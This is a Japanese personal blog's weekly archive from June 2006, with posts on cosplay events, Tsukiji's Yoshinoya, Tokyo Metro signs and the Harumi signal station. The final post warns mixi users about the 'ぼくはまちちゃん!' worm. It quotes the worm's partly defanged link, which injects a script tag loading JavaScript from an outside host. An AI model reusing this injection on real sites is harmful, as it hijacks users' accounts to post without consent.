« 2006年6月11日 - 2006年6月17日 | トップページ | 2006年6月25日 - 2006年7月1日 »

2006年6月18日 - 2006年6月24日の14件の記事

2006年6月24日 (土)

[WE]リバーサイドホテル

リバーサイドホテル

リバーサイドホテル

リバーサイドホテル

街の角から素敵なバスが出るー

そんな墨田川も首都高速も見下ろす展望風呂のある浅草駅前のカプセルホテルで寝て居ます。いわゆる最前線w

ここ、首都高からも風呂丸見えなのかなw<双眼鏡とかなら見えそうだけど
墨田川も花火大会の時はすごいんだろうなぁ・・・眺め。

前泊っていうと、免許試験場の近所の旅館に泊まって集中講義受けるみたいな・・・
つか、7時半に免許試験場になんか着けないところが多いってw
うちは泊まらなかったけど、家を出たのは朝4時だったし・・・

まあ、明日は何時に出陣しようかなー

| | コメント (0) | トラックバック (0)

[WE]♪土曜の昼下がり〜

[WE]♪土曜の昼下がり〜

一般人多すぎ。
外国人も多すぎ(笑)
何回コスプレイベントと言うものの説明をしただろうか。

楽しいけどさ(笑)

グラサンセーラームーンは勘弁…

| | コメント (0) | トラックバック (0)

[WE]築地、場内進行。

[WE]築地、場内進行。

行く日行く日が休場日でなかなか行けなかった、吉野家築地店。吉野家一号店でございます。
基本、寿司屋が多い場内では異色の存在。

現在のメニューは国産牛肉を使用した牛丼、牛皿とサイドメニューだけ。
カレー、定食類は無し。
牛丼を提供しているのはここと競馬場内店くらいかなぁ?うろ覚えですが。

米国産とは明らかに肉質が違うのがわかりました。
タレを吸って縮むって言うのかな?
なんかスカスカ感が。

今後は吉野家伝統の釜でなく、大国の圧力でぐつぐつ煮込まれた肉がやってくる訳ですが、どうなんでしょうかねぇ。

因みに本日の築地店の営業は既に終了しております(笑)

場外も寿司屋が多いけど、そこに紛れて紀文総本店とか、テリー伊藤さんのお兄さん?(うろ覚え)の玉子焼き屋『丸武』とかもあったな。

『土曜の築地は面白い!』っていう場外市場のポスターはその繋がりか、テリーさんだし(笑)


さて後楽園方面に行きますかねぇ。

| | コメント (0) | トラックバック (0)

[WE].metro//SIGN

[WE].metro//SIGN

営団から東京地下鉄に変わったメトロ。

駅構内の案内・サインも少しづつ変更されて来ています。

これは新しいバージョン。
見慣れた斜めの路線案内よりはすっきりしてるかな。
ただ時刻表が屈まないと見えない程低い位置になったのはいただけないなぁと思ったり。

さて『ストーカーと呼ばないで』も買ったし、メトロに乗って何処へ行こうか。

| | コメント (0) | トラックバック (0)

The Weekender

今週末の日曜はいよいよ待ちに待った「QMAKET2」http://qmaket.jp/
東京都立産業貿易センター台東館5階(東武浅草駅北)ですよ〜

あまりに楽しみなので土曜のうちから上京しちゃいます。

土曜日は都内某所で僕を殴打(ぇ
まあ、多分秋葉原には行くだろうけどw

| | コメント (0) | トラックバック (0)

2006年6月22日 (木)

[07x]そして1年の月日が流れ去り

[07x]そして1年の月日が流れ去り

8年前に関西に転勤になり、そしてまた関東へ戻ってきて・・・
今月末で丁度1年になります。

トリビアの泉でもやってたけど、8年前の1年と今の1年は、断然今の1年の方が短く感じますね。
どちらも同じ3153600秒という時間には変わりはないんですが。

関西を離れる3日前に行ってきた京都のコスプレイベント。
その帰りに撮影してきたネタ写真が掘り出せたのでまたしばらくネット上に上げてみることに。

HPのトップページで使ったのですが、トップページ用の写真って加工してアップしたら次々上書きするので残してないこと多かったのに・・・

また京都方面には行ってみたいもんです。今度こそ純粋に観光でw<ムリ

| | コメント (0) | トラックバック (0)

2006年6月21日 (水)

[310]雑学○×

問題:茨城県名産の「アンデスメロン」。語源は「安心です」である。
○か×か?

| | コメント (1) | トラックバック (0)

2006年6月20日 (火)

[同人]ちょい恐い

『空気読めマテ(ry』
じゃあ無くって。

 今年の夏コミは初めての鉄道島で参加。
 生半可な知識でサークル出そうものなら二度とサークル通らないんじゃないかな〜とか怯えてみたりするのですが、
それ以上に恐いのが
『自分の知識をひけらかす事しか言わない参加者』との遭遇。

 今まででもジャンル違い(電源不要ゲーム)のサークルで鉄道本の同人誌を頒布していたのですが、
鉄道本を手にしていただく方の中に、自分の鉄道知識をひけらかすだけひけらかす方がお出でになってしまうんですよねー、毎年一人以上は。
 まあこちらも一回でも相槌を打ってしまった時点で負けかな、と思ってはいるのですが。
 ぴしゃりと言えない自分が悪いのはわかっていますが、20分近く演説していった方も居ました。その人とは途中から目線を合わせないようにしていましたが止まりませんでしたorz
 それが立ち去ったあと思わず両隣のサークルに謝ってしまいましたし(苦笑)

 鉄道ジャンル以外の島でこういう現状なので…、鉄道島なんて言ったらもっとピンポイントなので…ガクガクブルブル

 考え過ぎなんだろうか、それとも現実はもっと凄いのが居るのか…

| | コメント (1) | トラックバック (0)

2006年6月19日 (月)

豆腐

豆腐

土曜日に買った『豆腐屋ジョニー』を晩に食べてみた。


四角い豆腐とはまた違った食感。
とりあえず『おやじ味噌』を乗せて食う。
結構ピリ辛でうまひ。
ぐちゃぐちゃに混ぜるのがミソかな。


醤油でも食べてみた。醤油は味があまり染み込まないなぁ〜

| | コメント (0) | トラックバック (0)

[ネタ]理論

問題:次の文を含む理論は〇〇論?

文:『モテるものと、モテざるもの』


……

………

 ツ
 豆
(゜▽゜)<[悲観論]

o...... rz

| | コメント (0) | トラックバック (0)

晴海埠頭のコレ、なんだっけ?

晴海埠頭のコレ、なんだっけ?

今日の晴海埠頭客船ターミナルでのコスプレイベントついでに、疑問に思ったことを今夜中に解決。

客船ターミナルの先にこんなものが立っており、アルファベットが点滅していたりします。
1番よく見かけるのは[F]の点滅です。

今日は、[O]と[X]が交互に点滅していて・・・
十数分後には[O]だけの点滅に変わっていたり・・・

これは一体何を示しているのだろうか・・・
と思ってgoogle先生に伺ったところ、

海上保安庁の横浜航路についてのページに行き当たりました。
http://www.kaiho.mlit.go.jp/03kanku/yokohama/safety/passage/yokohama%20kouro.htm

晴海埠頭のアレは「晴海信号所」と言うもので、東京湾内の航路の進行方法を指示しているものだそうです。
信号の意味と、航行の仕方は上記のリンクから確認できます。(横浜航路の例が出ます)

今日の場合は、
[F]・・・管制船以外は航行自由
[O][X]交互に点滅・・・航路内を航行中の管制船はそのまま航行。その他の船は航路外で待機。まもなく[O]に変わる。
[O]・・・管制船・航路内航行線は出航可。その他の船舶は入航禁止。

なんだそうですよw

| | コメント (0) | トラックバック (0)

2006年6月18日 (日)

通過追い抜き

【先発 1stDEPT.】
通過追い抜き
【後発 2ndDEPT.】
通過追い抜き

♪ぴんぽんぱんぽん

間もなく1番線に各駅停車HPがまいります。白線の内側に下がってお待ちください。
このHPは、途中後続のmixiマイページに通過追い抜きされます。

HPは1997年から現在までで25755アクセス。
mixiは2005年1月位から現在まで25750アクセス。

今夜中に通過追い抜きされますね。

| | コメント (0) | トラックバック (0)

Driving

Driving

車検も無事通ったので常磐道でちと遠出。
某埠頭方面へ(笑)

SDカードにぶち込んだノンジャンルな241曲をBGMにして。

つか、この車で常磐道上るの初めてなんだよなぁ…
普段は100km/h順守の高速バスだから楽だけど、首都高無事に走れるだろうか。
さすがにバスよりは早く都心着けそうだけど、駐車場の値段で、今後の車での上京を考えよう(笑)

| | コメント (1) | トラックバック (0)

[mixi内緊急]『ぼくはまちちゃん!』

2005年4月頃に、「ぼくはまちちゃん!」のタイトルで、勝手に日記を書き込むjavascriptが一部マイミクさんの間に出回ってしまったようです。
参考記事2005年4月23日のITmediaから。
http://www.itmedia.co.jp/enterprise/articles/0504/23/news005.html

「ぼくはまちちゃん!」というタイトルの日記にあるリンクは絶対クリックなさらぬように。

−−−以下、引用
こんにちはこんにちは!!
↓そんなことより、これはひどい
ここにmixi内なのにありえない長さのリンクが貼られています。
−−−引用ここまで

マウスカーソルをリンクに当てると、下記の内容になっています。文字をコードで記入することで、javascriptを実行させることを見せなくしています。
(リンクされないように、一部全角化、[]化、"抜きにしています。)
http://mixi.jp/list_comment.pl?id=609805][script src=http://hamachiya.com/bh9.js/][/script][x・・・

リンクをクリックすると「このデータはありません」と出ますが、その裏でjavascriptは実行済みです。


「mixi内でもリンクを鵜呑みにしないこと」が大事なんですね。

| | コメント (0) | トラックバック (1)

« 2006年6月11日 - 2006年6月17日 | トップページ | 2006年6月25日 - 2006年7月1日 »